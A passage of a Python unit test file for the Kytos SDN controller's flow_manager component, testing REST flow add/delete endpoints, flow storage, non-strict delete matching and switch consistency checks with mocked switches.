url = f"{self.API_URL}/v2/flows/00:00:00:00:00:00:00:05"
response = api.get(url)
self.assertEqual(response.status_code, 404)
@patch("napps.kytos.flow_manager.main.Main._install_flows")
def test_rest_add_and_delete_without_dpid(self, mock_install_flows):
"""Test add and delete rest method without dpid."""
api = get_test_client(self.napp.controller, self.napp)
for method in ["flows", "delete"]:
url = f"{self.API_URL}/v2/{method}"
response_1 = api.post(url, json={"flows": [{"priority": 25}]})
response_2 = api.post(url)
self.assertEqual(response_1.status_code, 202)
self.assertEqual(response_2.status_code, 400)
self.assertEqual(mock_install_flows.call_count, 2)
@patch("napps.kytos.flow_manager.main.Main._install_flows")
def test_rest_add_and_delete_with_dpid(self, mock_install_flows):
"""Test add and delete rest method with dpid."""
api = get_test_client(self.napp.controller, self.napp)
data = {"flows": [{"priority": 25}]}
for method in ["flows", "delete"]:
url_1 = f"{self.API_URL}/v2/{method}/00:00:00:00:00:00:00:01"
url_2 = f"{self.API_URL}/v2/{method}/00:00:00:00:00:00:00:02"
response_1 = api.post(url_1, json=data)
response_2 = api.post(url_2, json=data)
self.assertEqual(response_1.status_code, 202)
if method == "delete":
self.assertEqual(response_2.status_code, 202)
self.assertEqual(mock_install_flows.call_count, 3)
@patch("napps.kytos.flow_manager.main.Main._install_flows")
def test_rest_add_and_delete_with_dpi_fail(self, mock_install_flows):
"""Test fail case the add and delete rest method with dpid."""
api = get_test_client(self.napp.controller, self.napp)
data = {"flows": [{"priority": 25}]}
for method in ["flows", "delete"]:
url_1 = f"{self.API_URL}/v2/{method}/00:00:00:00:00:00:00:01"
url_2 = f"{self.API_URL}/v2/{method}/00:00:00:00:00:00:00:02"
url_3 = f"{self.API_URL}/v2/{method}/00:00:00:00:00:00:00:03"
response_1 = api.post(url_1)
response_2 = api.post(url_2, data=data)
response_3 = api.post(url_2, json={})
response_4 = api.post(url_3, json=data)
self.assertEqual(response_1.status_code, 400)
self.assertEqual(response_2.status_code, 415)
self.assertEqual(response_3.status_code, 400)
self.assertEqual(response_4.status_code, 404)
self.assertEqual(mock_install_flows.call_count, 0)
@patch("napps.kytos.flow_manager.main.Main._install_flows")
def test_rest_flow_mod_add_switch_not_connected(self, mock_install_flows):
"""Test sending a flow mod when a swith isn't connected."""
api = get_test_client(self.napp.controller, self.napp)
mock_install_flows.side_effect = SwitchNotConnectedError(
"error", flow=MagicMock()
)
url = f"{self.API_URL}/v2/flows"
response = api.post(url, json={"flows": [{"priority": 25}]})
self.assertEqual(response.status_code, 424)
@patch("napps.kytos.flow_manager.main.Main._store_changed_flows")
@patch("napps.kytos.flow_manager.main.Main._send_napp_event")
@patch("napps.kytos.flow_manager.main.Main._add_flow_mod_sent")
@patch("napps.kytos.flow_manager.main.Main._send_barrier_request")
@patch("napps.kytos.flow_manager.main.Main._send_flow_mod")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
def test_rest_flow_mod_add_switch_not_connected_force(self, *args):
"""Test sending a flow mod when a swith isn't connected with force option."""
(
mock_flow_factory,
mock_send_flow_mod,
_,
_,
_,
mock_store_changed_flows,
) = args
api = get_test_client(self.napp.controller, self.napp)
mock_send_flow_mod.side_effect = SwitchNotConnectedError(
"error", flow=MagicMock()
)
_id = str(uuid4())
serializer = MagicMock()
flow = MagicMock()
flow.id.return_value = _id
serializer.from_dict.return_value = flow
mock_flow_factory.return_value = serializer
url = f"{self.API_URL}/v2/flows"
flow_dict = {"flows": [{"priority": 25}]}
response = api.post(url, json=dict(flow_dict, **{"force": True}))
self.assertEqual(response.status_code, 202)
mock_store_changed_flows.assert_called_with(
"add",
flow_dict["flows"][0],
mock_flow_factory().from_dict().id,
self.switch_01,
)
def test_get_all_switches_enabled(self):
"""Test _get_all_switches_enabled method."""
switches = self.napp._get_all_switches_enabled()
self.assertEqual(switches, [self.switch_01])
@patch("napps.kytos.flow_manager.main.Main._store_changed_flows")
@patch("napps.kytos.flow_manager.main.Main._send_napp_event")
@patch("napps.kytos.flow_manager.main.Main._add_flow_mod_sent")
@patch("napps.kytos.flow_manager.main.Main._send_barrier_request")
@patch("napps.kytos.flow_manager.main.Main._send_flow_mod")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
def test_install_flows(self, *args):
"""Test _install_flows method."""
(
mock_flow_factory,
mock_send_flow_mod,
mock_send_barrier_request,
mock_add_flow_mod_sent,
mock_send_napp_event,
_,
) = args
serializer = MagicMock()
flow = MagicMock()
flow_mod = MagicMock()
flow.as_of_add_flow_mod.return_value = flow_mod
serializer.from_dict.return_value = flow
mock_flow_factory.return_value = serializer
flows_dict = {"flows": [MagicMock()]}
switches = [self.switch_01]
self.napp._install_flows("add", flows_dict, switches)
mock_send_flow_mod.assert_called_with(flow.switch, flow_mod)
mock_add_flow_mod_sent.assert_called_with(flow_mod.header.xid, flow, "add")
mock_send_napp_event.assert_called_with(self.switch_01, flow, "pending")
mock_send_barrier_request.assert_called()
@patch("napps.kytos.flow_manager.main.Main._store_changed_flows")
@patch("napps.kytos.flow_manager.main.Main._send_napp_event")
@patch("napps.kytos.flow_manager.main.Main._add_flow_mod_sent")
@patch("napps.kytos.flow_manager.main.Main._send_barrier_request")
@patch("napps.kytos.flow_manager.main.Main._send_flow_mod")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
def test_install_flows_with_delete_strict(self, *args):
"""Test _install_flows method with strict delete command."""
(
mock_flow_factory,
mock_send_flow_mod,
mock_send_barrier_request,
mock_add_flow_mod_sent,
mock_send_napp_event,
_,
) = args
serializer = MagicMock()
flow = MagicMock()
flow_mod = MagicMock()
flow.as_of_strict_delete_flow_mod.return_value = flow_mod
serializer.from_dict.return_value = flow
mock_flow_factory.return_value = serializer
flows_dict = {"flows": [MagicMock()]}
switches = [self.switch_01]
self.napp._install_flows("delete_strict", flows_dict, switches)
mock_send_flow_mod.assert_called_with(flow.switch, flow_mod)
mock_add_flow_mod_sent.assert_called_with(
flow_mod.header.xid, flow, "delete_strict"
)
mock_send_napp_event.assert_called_with(self.switch_01, flow, "pending")
mock_send_barrier_request.assert_called()
@patch("napps.kytos.flow_manager.main.Main._install_flows")
def test_event_add_flow(self, mock_install_flows):
"""Test method for installing flows on the switches through events."""
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid)
self.napp.controller.switches = {dpid: switch}
mock_flow_dict = MagicMock()
event = get_kytos_event_mock(
name="kytos.flow_manager.flows.install",
content={"dpid": dpid, "flow_dict": mock_flow_dict},
)
self.napp.event_flows_install_delete(event)
mock_install_flows.assert_called_with(
"add", mock_flow_dict, [switch], reraise_conn=True
)
@patch("napps.kytos.flow_manager.main.Main._install_flows")
def test_event_flows_install_delete(self, mock_install_flows):
"""Test method for removing flows on the switches through events."""
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid)
self.napp.controller.switches = {dpid: switch}
mock_flow_dict = MagicMock()
event = get_kytos_event_mock(
name="kytos.flow_manager.flows.delete",
content={"dpid": dpid, "flow_dict": mock_flow_dict},
)
self.napp.event_flows_install_delete(event)
mock_install_flows.assert_called_with(
"delete", mock_flow_dict, [switch], reraise_conn=True
)
def test_add_flow_mod_sent(self):
"""Test _add_flow_mod_sent method."""
xid = 0
flow = MagicMock()
self.napp._add_flow_mod_sent(xid, flow, "add")
self.assertEqual(self.napp._flow_mods_sent[xid], (flow, "add"))
@patch("kytos.core.buffers.KytosEventBuffer.put")
def test_send_flow_mod(self, mock_buffers_put):
"""Test _send_flow_mod method."""
switch = get_switch_mock("00:00:00:00:00:00:00:01", 0x04)
flow_mod = MagicMock()
self.napp._send_flow_mod(switch, flow_mod)
mock_buffers_put.assert_called()
@patch("kytos.core.buffers.KytosEventBuffer.put")
def test_send_flow_mod_error(self, mock_buffers_put):
"""Test _send_flow_mod method error."""
switch = get_switch_mock("00:00:00:00:00:00:00:01", 0x04)
switch.is_connected = MagicMock(return_value=False)
flow_mod = MagicMock()
with self.assertRaises(SwitchNotConnectedError):
self.napp._send_flow_mod(switch, flow_mod)
mock_buffers_put.assert_not_called()
@patch("kytos.core.buffers.KytosEventBuffer.put")
def test_send_napp_event(self, mock_buffers_put):
"""Test _send_napp_event method."""
switch = get_switch_mock("00:00:00:00:00:00:00:01", 0x04)
flow = MagicMock()
for command in ["add", "delete", "delete_strict", "error"]:
self.napp._send_napp_event(switch, flow, command)
self.assertEqual(mock_buffers_put.call_count, 4)
@patch("napps.kytos.flow_manager.main.Main._del_stored_flow_by_id")
@patch("napps.kytos.flow_manager.main.Main._send_napp_event")
def test_handle_errors(self, mock_send_napp_event, mock_del_stored):
"""Test handle_errors method."""
flow = MagicMock()
flow.as_dict.return_value = {}
flow.cookie = 0
self.napp._flow_mods_sent[0] = (flow, "add")
switch = get_switch_mock("00:00:00:00:00:00:00:01")
switch.connection = get_connection_mock(
0x04, get_switch_mock("00:00:00:00:00:00:00:01")
)
protocol = MagicMock()
protocol.unpack.return_value = "error_packet"
switch.connection.protocol = protocol
message = MagicMock()
message.header.xid.value = 0
message.error_type = 2
message.code = 5
event = get_kytos_event_mock(
name=".*.of_core.*.ofpt_error",
content={"message": message, "source": switch.connection},
)
self.napp.handle_errors(event)
mock_send_napp_event.assert_called_with(
flow.switch,
flow,
"error",
error_command="add",
error_code=5,
error_type=2,
)
mock_del_stored.assert_called()
@patch("napps.kytos.flow_manager.main.StoreHouse.get_data")
def test_load_flows(self, mock_storehouse):
"""Test load flows."""
self.napp._load_flows()
mock_storehouse.assert_called()
@patch("napps.kytos.flow_manager.main.ENABLE_CONSISTENCY_CHECK", False)
@patch("napps.kytos.flow_manager.main.Main._install_flows")
def test_resend_stored_flows(self, mock_install_flows):
"""Test resend stored flows."""
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
mock_event = MagicMock()
flow = {"command": "add", "flow": MagicMock()}
mock_event.content = {"switch": switch}
self.napp.controller.switches = {dpid: switch}
self.napp.stored_flows = {dpid: {0: [flow]}}
self.napp.resend_stored_flows(mock_event)
mock_install_flows.assert_called()
@patch("napps.kytos.of_core.flow.FlowFactory.get_class")
@patch("napps.kytos.flow_manager.main.StoreHouse.save_flow")
def test_store_changed_flows(self, mock_save_flow, _):
"""Test store changed flows."""
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
flow = {
"priority": 17,
"cookie": 84114964,
"command": "add",
"match": {"dl_dst": "00:15:af:d5:38:98"},
}
match_fields = {
"priority": 17,
"cookie": 84114964,
"command": "add",
"dl_dst": "00:15:af:d5:38:98",
}
flows = {"flow": flow}
command = "add"
stored_flows = {
84114964: [
{
"match_fields": match_fields,
"flow": flow,
}
]
}
self.napp.stored_flows = {dpid: stored_flows}
self.napp._store_changed_flows(command, flows, str(uuid4()), switch)
mock_save_flow.assert_called()
self.napp.stored_flows = {}
self.napp._store_changed_flows(command, flows, str(uuid4()), switch)
mock_save_flow.assert_called()
@patch("napps.kytos.flow_manager.main.Main._install_flows")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
def test_check_switch_consistency_add(self, *args):
"""Test check_switch_consistency method.
This test checks the case when a flow is missing on the switch and has the
ADD command.
"""
(mock_flow_factory, mock_install_flows) = args
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.flows = []
flow_1 = MagicMock()
flow_1.as_dict.return_value = {"flow_1": "data"}
stored_flows = [{"flow": {"flow_1": "data"}}]
serializer = MagicMock()
serializer.flow.cookie.return_value = 0
mock_flow_factory.return_value = serializer
self.napp.stored_flows = {dpid: {0: stored_flows}}
self.napp.check_switch_consistency(switch)
mock_install_flows.assert_called()
@patch("napps.kytos.flow_manager.storehouse.StoreHouse.save_flow")
def test_add_overlapping_flow(self, *args):
"""Test add an overlapping flow."""
(_,) = args
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
cookie = 0x20
self.napp.stored_flows = {
dpid: {
cookie: [
{
"flow": {
"priority": 10,
"cookie": 84114904,
"match": {
"ipv4_src": "192.168.1.1",
"ipv4_dst": "192.168.0.2",
},
"actions": [{"action_type": "output", "port": 2}],
}
}
]
}
}
new_actions = [{"action_type": "output", "port": 3}]
flow_dict = {
"priority": 10,
"cookie": cookie,
"match": {
"ipv4_src": "192.168.1.1",
"ipv4_dst": "192.168.0.2",
},
"actions": new_actions,
}
_id = str(uuid4())
self.napp._add_flow_store(flow_dict, _id, switch)
assert len(self.napp.stored_flows[dpid]) == 1
assert self.napp.stored_flows[dpid][0x20][0]["flow"]["actions"] == new_actions
assert (
self.napp.stored_flows[dpid][0x20][0]["state"]
== FlowEntryState.PENDING.value
)
assert self.napp.stored_flows[dpid][0x20][0]["_id"] == _id
assert self.napp.stored_flows[dpid][0x20][0]["created_at"]
@patch("napps.kytos.flow_manager.storehouse.StoreHouse.save_flow")
def test_add_overlapping_flow_multiple_stored(self, *args):
"""Test add an overlapping flow with multiple flows stored."""
(_,) = args
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
cookie = 0x20
stored_flows_list = [
{
"flow": {
"actions": [{"action_type": "output", "port": 2}],
"match": {"dl_vlan": 100, "in_port": 1},
"priority": 10,
},
},
{
"flow": {
"actions": [{"action_type": "output", "port": 3}],
"match": {"dl_vlan": 200, "in_port": 1},
"priority": 10,
},
},
{
"flow": {
"actions": [{"action_type": "output", "port": 4}],
"match": {"dl_vlan": 300, "in_port": 1},
"priority": 10,
},
},
{
"flow": {
"actions": [{"action_type": "output", "port": 4}],
"match": {"in_port": 1},
"priority": 10,
},
},
]
self.napp.stored_flows = {dpid: {cookie: list(stored_flows_list)}}
new_actions = [{"action_type": "output", "port": 3}]
overlapping_flow = {
"priority": 10,
"cookie": cookie,
"match": {
"in_port": 1,
},
"actions": new_actions,
}
_id = str(uuid4())
self.napp._add_flow_store(overlapping_flow, _id, switch)
assert len(self.napp.stored_flows[dpid][cookie]) == len(stored_flows_list)
# only the last flow is expected to be strictly matched
self.assertDictEqual(
self.napp.stored_flows[dpid][cookie][len(stored_flows_list) - 1]["flow"],
overlapping_flow,
)
# all flows except the last one should still be the same
for i in range(0, len(stored_flows_list) - 1):
self.assertDictEqual(
self.napp.stored_flows[dpid][cookie][i], stored_flows_list[i]
)
@patch("napps.kytos.flow_manager.storehouse.StoreHouse.save_flow")
def test_add_overlapping_flow_diff_priority(self, *args):
"""Test that a different priority wouldn't overlap."""
(_,) = args
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
cookie = 0x20
self.napp.stored_flows = {
dpid: {
cookie: [
{
"flow": {
"priority": 10,
"cookie": 84114904,
"match": {
"ipv4_src": "192.168.1.1",
"ipv4_dst": "192.168.0.2",
},
"actions": [{"action_type": "output", "port": 2}],
}
}
]
}
}
new_actions = [{"action_type": "output", "port": 3}]
flow_dict = {
"priority": 11,
"cookie": cookie,
"match": {
"ipv4_src": "192.168.1.1",
"ipv4_dst": "192.168.0.2",
},
"actions": new_actions,
}
_id = str(uuid4())
self.napp._add_flow_store(flow_dict, _id, switch)
assert len(self.napp.stored_flows[dpid][cookie]) == 2
assert (
self.napp.stored_flows[dpid][cookie][1]["state"]
== FlowEntryState.PENDING.value
)
assert self.napp.stored_flows[dpid][0x20][1]["_id"] == _id
assert self.napp.stored_flows[dpid][cookie][1]["created_at"]
@patch("napps.kytos.flow_manager.main.Main._install_flows")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
def test_check_switch_flow_not_missing(self, *args):
"""Test check_switch_consistency method.
This test checks the case when the flow is not missing.
"""
(mock_flow_factory, mock_install_flows) = args
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
flow_1 = MagicMock()
flow_dict = {
"flow": {
"priority": 10,
"cookie": 84114904,
"match": {
"ipv4_src": "192.168.1.1",
"ipv4_dst": "192.168.0.2",
},
"actions": [],
}
}
flow_1.cookie = 84114904
flow_1.as_dict.return_value = flow_dict
serializer = MagicMock()
serializer.from_dict.return_value = flow_1
switch.flows = [flow_1]
mock_flow_factory.return_value = serializer
self.napp.stored_flows = {
dpid: {
84114904: [
{
"flow": {
"priority": 10,
"cookie": 84114904,
"match": {
"ipv4_src": "192.168.1.1",
"ipv4_dst": "192.168.0.2",
},
"actions": [],
}
}
]
}
}
self.napp.check_switch_consistency(switch)
mock_install_flows.assert_not_called()
@patch("napps.kytos.flow_manager.main.Main._install_flows")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
def test_check_switch_flow_missing(self, *args):
"""Test check_switch_consistency method.
This test checks the case when the flow is missing.
"""
(mock_flow_factory, mock_install_flows) = args
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
flow_1 = MagicMock()
flow_dict = {
"flow": {
"match": {
"in_port": 1,
},
"actions": [],
}
}
flow_1.cookie = 0
flow_1.as_dict.return_value = flow_dict
serializer = MagicMock()
serializer.from_dict.return_value = flow_1
switch.flows = [flow_1]
mock_flow_factory.return_value = serializer
self.napp.stored_flows = {
dpid: {
84114904: [
{
"flow": {
"priority": 10,
"cookie": 84114904,
"match": {
"ipv4_src": "192.168.1.1",
"ipv4_dst": "192.168.0.2",
},
"actions": [],
}
}
]
}
}
self.napp.check_switch_consistency(switch)
mock_install_flows.assert_called()
@patch("napps.kytos.flow_manager.main.Main._install_flows")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
def test_check_switch_consistency_ignore(self, *args):
"""Test check_switch_consistency method.
This test checks the case when a flow is missing in the last received
flow_stats because the flow was just installed. Thus, it should be
ignored.
"""
(mock_flow_factory, mock_install_flows) = args
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.flows = []
flow_1 = MagicMock()
flow_1.as_dict.return_value = {"flow_1": "data"}
stored_flows = {
0: [
{
"created_at": now().strftime("%Y-%m-%dT%H:%M:%S"),
"flow": {"flow_1": "data"},
}
]
}
serializer = MagicMock()
serializer.flow.cookie.return_value = 0
mock_flow_factory.return_value = serializer
self.napp.stored_flows = {dpid: stored_flows}
self.napp.check_switch_consistency(switch)
mock_install_flows.assert_not_called()
@patch("napps.kytos.flow_manager.main.Main._install_flows")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
def test_check_storehouse_consistency(self, *args):
"""Test check_storehouse_consistency method.
This test checks the case when a flow is missing in storehouse.
"""
(mock_flow_factory, mock_install_flows) = args
cookie_exception_interval = [(0x2B00000000000011, 0x2B000000000000FF)]
self.napp.cookie_exception_range = cookie_exception_interval
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
flow_1 = MagicMock()
flow_1.cookie = 0x2B00000000000010
flow_1.as_dict.return_value = {"flow_1": "data", "cookie": 1}
switch.flows = [flow_1]
stored_flows = [{"flow": {"flow_2": "data", "cookie": 1}}]
serializer = flow_1
mock_flow_factory.return_value = serializer
self.napp.stored_flows = {dpid: {0: stored_flows}}
self.napp.check_storehouse_consistency(switch)
mock_install_flows.assert_called()
@patch("napps.kytos.flow_manager.main.Main._install_flows")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
@patch("napps.kytos.flow_manager.main.StoreHouse.save_flow")
def test_no_strict_delete_with_cookie(self, *args):
"""Test the non-strict matching method.
A FlowMod with a non-zero cookie but empty match fields shouldn't match
other existing installed flows that have match clauses.
"""
(mock_save_flow, _, _) = args
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
stored_flow = {
"flow": {
"actions": [{"action_type": "output", "port": 4294967293}],
"match": {"dl_vlan": 3799, "dl_type": 35020},
},
}
flow_to_install = {
"cookie": 6191162389751548793,
"cookie_mask": 18446744073709551615,
}
stored_flows = {0: [stored_flow]}
command = "delete"
self.napp.stored_flows = {dpid: stored_flows}
self.napp._store_changed_flows(command, flow_to_install, str(uuid4()), switch)
mock_save_flow.assert_not_called()
self.assertDictEqual(self.napp.stored_flows[dpid][0][0], stored_flow)
@patch("napps.kytos.flow_manager.main.Main._install_flows")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
@patch("napps.kytos.flow_manager.main.StoreHouse.save_flow")
def test_no_strict_delete(self, *args):
"""Test the non-strict matching method.
Test non-strict matching to delete a Flow using a cookie.
"""
(mock_save_flow, _, _) = args
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
stored_flow = {
"flow": {
"actions": [{"action_type": "set_vlan", "vlan_id": 300}],
"cookie": 6191162389751548793,
"match": {"dl_vlan": 300, "in_port": 1},
},
}
stored_flow2 = {
"flow": {
"actions": [],
"cookie": 4961162389751548787,
"match": {"in_port": 2},
},
}
flow_to_install = {
"cookie": 6191162389751548793,
"cookie_mask": 18446744073709551615,
}
stored_flows = {
6191162389751548793: [stored_flow],
4961162389751548787: [stored_flow2],
}
command = "delete"
self.napp.stored_flows = {dpid: stored_flows}
self.napp._store_changed_flows(command, flow_to_install, str(uuid4()), switch)
mock_save_flow.assert_called()
self.assertEqual(len(self.napp.stored_flows), 1)
@patch("napps.kytos.flow_manager.main.Main._install_flows")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
@patch("napps.kytos.flow_manager.main.StoreHouse.save_flow")
def test_no_strict_delete_with_ipv4(self, *args):
"""Test the non-strict matching method.
Test non-strict matching to delete a Flow using IPv4.
"""
(mock_save_flow, _, _) = args
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
flow_to_install = {"match": {"ipv4_src": "192.168.1.1"}}
stored_flows = {
84114904: [
{
"flow": {
"priority": 10,
"cookie": 84114904,
"match": {
"ipv4_src": "192.168.1.1",
"ipv4_dst": "192.168.0.2",
},
"actions": [],
}
}
],
4961162389751548787: [
{
"flow": {
"actions": [],
"cookie": 4961162389751548787,
"match": {"in_port": 2},
}
}
],
}
command = "delete"
self.napp.stored_flows = {dpid: stored_flows}
self.napp._store_changed_flows(command, flow_to_install, str(uuid4()), switch)
mock_save_flow.assert_called()
expected_stored = {
4961162389751548787: [
{
"flow": {
"actions": [],
"cookie": 4961162389751548787,
"match": {"in_port": 2},
},
},
]
}
self.assertDictEqual(self.napp.stored_flows[dpid], expected_stored)
@patch("napps.kytos.flow_manager.main.Main._install_flows")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
@patch("napps.kytos.flow_manager.main.StoreHouse.save_flow")
def test_no_strict_delete_in_port(self, *args):
"""Test the non-strict matching method.
Test non-strict matching to delete a Flow matching in_port.
"""
(mock_save_flow, _, _) = args
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
flow_to_install = {"match": {"in_port": 1}}
stored_flow = {
0: [
{
"flow": {
"priority": 10,
"cookie": 84114904,
"match": {
"in_port": 1,
"dl_vlan": 100,
},
"actions": [],
},
},
{
"flow": {
"actions": [],
"match": {"in_port": 2},
},
},
{
"flow": {
"priority": 20,
"cookie": 84114904,
"match": {
"in_port": 1,
"dl_vlan": 102,
},
"actions": [],
},
},
]
}
command = "delete"
self.napp.stored_flows = {dpid: stored_flow}
self.napp._store_changed_flows(command, flow_to_install, str(uuid4()), switch)
mock_save_flow.assert_called()
expected_stored = {
0: [
{
"flow": {"actions": [], "match": {"in_port": 2}},
}
]
}
self.assertDictEqual(self.napp.stored_flows[dpid], expected_stored)
@patch("napps.kytos.flow_manager.main.Main._install_flows")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
@patch("napps.kytos.flow_manager.main.StoreHouse.save_flow")
def test_no_strict_delete_all_if_empty_match(self, *args):
"""Test the non-strict matching method.
Test non-strict matching to delete all if empty match is given.
"""
(mock_save_flow, _, _) = args
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
flow_to_install = {"match": {}}
stored_flow = {
0: [
{
"flow": {
"priority": 10,
"match": {
"in_port": 1,
"dl_vlan": 100,
},
"actions": [],
}
},
{
"flow": {
"priority": 20,
"match": {
"in_port": 1,
"dl_vlan": 102,
},
"actions": [],
},
},
]
}
command = "delete"
self.napp.stored_flows = {dpid: stored_flow}
self.napp._store_changed_flows(command, flow_to_install, str(uuid4()), switch)
mock_save_flow.assert_called()
expected_stored = {}
self.assertDictEqual(self.napp.stored_flows[dpid], expected_stored)
@patch("napps.kytos.flow_manager.main.Main._install_flows")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
@patch("napps.kytos.flow_manager.main.StoreHouse.save_flow")
def test_no_strict_delete_with_ipv4_fail(self, *args):
"""Test the non-strict matching method.
Test the non-strict matching failure case when deleting a Flow using IPv4.
"""
(mock_save_flow, _, _) = args
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
stored_flow = {
"flow": {
"priority": 10,
"cookie": 84114904,
"match": {
"ipv4_src": "192.168.2.1",
"ipv4_dst": "192.168.0.2",
},
"actions": [],
},
}
stored_flow2 = {
"flow": {
"actions": [],
"cookie": 4961162389751548787,
"match": {"in_port": 2},
},
}
flow_to_install = {"match": {"ipv4_src": "192.168.20.20"}}
stored_flows = {0: [stored_flow, stored_flow2]}
command = "delete"
self.napp.stored_flows = {dpid: stored_flows}
self.napp._store_changed_flows(command, flow_to_install, str(uuid4()), switch)
mock_save_flow.assert_not_called()
expected_stored = {
0: [
{
"flow": {
"priority": 10,
"cookie": 84114904,
"match": {
"ipv4_src": "192.168.2.1",
"ipv4_dst": "192.168.0.2",
},
"actions": [],
},
},
{
"flow": {
"actions": [],
"cookie": 4961162389751548787,
"match": {"in_port": 2},
},
},
]
}
self.assertDictEqual(self.napp.stored_flows[dpid], expected_stored)
@patch("napps.kytos.flow_manager.main.Main._install_flows")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
@patch("napps.kytos.flow_manager.main.StoreHouse.save_flow")
def test_no_strict_delete_of10(self, *args):
"""Test the non-strict matching method.
Test non-strict matching to delete a Flow using OF10.
"""
(mock_save_flow, _, _) = args
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x01)
switch.id = dpid
stored_flow = {
"command": "add",
"flow": {
"actions": [{"max_len": 65535, "port": 6}],
"cookie": 4961162389751548787,
"match": {
"in_port": 80,
"dl_src": "00:00:00:00:00:00",
"dl_dst": "f2:0b:a4:7d:f8:ea",
"dl_vlan": 0,
"dl_vlan_pcp": 0,
"dl_type": 0,
"nw_tos": 0,
"nw_proto": 0,
"nw_src": "192.168.0.1",
"nw_dst": "0.0.0.0",
"tp_src": 0,
"tp_dst": 0,
},
"out_port": 65532,
"priority": 123,
},
}
stored_flow2 = {
"command": "add",
"flow": {
"actions": [],
"cookie": 4961162389751654,
"match": {
"in_port": 2,
"dl_src": "00:00:00:00:00:00",
"dl_dst": "f2:0b:a4:7d:f8:ea",
"dl_vlan": 0,
"dl_vlan_pcp": 0,
"dl_type": 0,
"nw_tos": 0,
"nw_proto": 0,
"nw_src": "192.168.0.1",
"nw_dst": "0.0.0.0",
"tp_src": 0,
"tp_dst": 0,
},
"out_port": 655,
"priority": 1,
},
}
flow_to_install = {"match": {"in_port": 80, "wildcards": 4194303}}
stored_flows = {0: [stored_flow, stored_flow2]}
command = "delete"
self.napp.stored_flows = {dpid: stored_flows}
self.napp._store_changed_flows(command, flow_to_install, str(uuid4()), switch)
mock_save_flow.assert_called()
self.assertEqual(len(self.napp.stored_flows[dpid]), 0)
@patch("napps.kytos.flow_manager.main.Main._install_flows")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
def test_consistency_cookie_ignored_range(self, *args):
"""Test the consistency `cookie` ignored range."""
(_, mock_install_flows) = args
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
cookie_ignored_interval = [
(0x2B00000000000011, 0x2B000000000000FF),
0x2B00000000000100,
]
self.napp.cookie_ignored_range = cookie_ignored_interval
flow = MagicMock()
expected = [
(0x2B00000000000010, 1),
(0x2B00000000000013, 0),
(0x2B00000000000100, 0),
(0x2B00000000000101, 1),
]
for cookie, called in expected:
with self.subTest(cookie=cookie, called=called):
mock_install_flows.call_count = 0
flow.cookie = cookie
flow.as_dict.return_value = {"flow_1": "data", "cookie": cookie}
switch.flows = [flow]
self.napp.stored_flows = {dpid: {0: [flow]}}
self.napp.check_storehouse_consistency(switch)
self.assertEqual(mock_install_flows.call_count, called)
@patch("napps.kytos.flow_manager.main.Main._install_flows")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
def test_consistency_table_id_ignored_range(self, *args):
"""Test the consistency `table_id` ignored range."""
(_, mock_install_flows) = args
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
table_id_ignored_interval = [(1, 2), 3]
self.napp.tab_id_ignored_range = table_id_ignored_interval
flow = MagicMock()
expected = [(0, 1), (3, 0), (4, 1)]
for table_id, called in expected:
with self.subTest(table_id=table_id, called=called):
mock_install_flows.call_count = 0
flow.table_id = table_id
switch.flows = [flow]
self.napp.stored_flows = {dpid: {0: [flow]}}
self.napp.check_storehouse_consistency(switch)
self.assertEqual(mock_install_flows.call_count, called)
def test_check_consistency_concurrency_control(self):
"""Test check consistency concurrency control, only a single
thread per switch is expected within a delta T."""
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
n_threads = 10
check_store = MagicMock()
check_switch = MagicMock()
self.napp.check_storehouse_consistency = check_store
self.napp.check_switch_consistency = check_switch
# make one upfront call; the threaded calls below should be suppressed by the per-switch control
self.napp.check_consistency(switch)
threads = []
for _ in range(n_threads):
thread = threading.Thread(
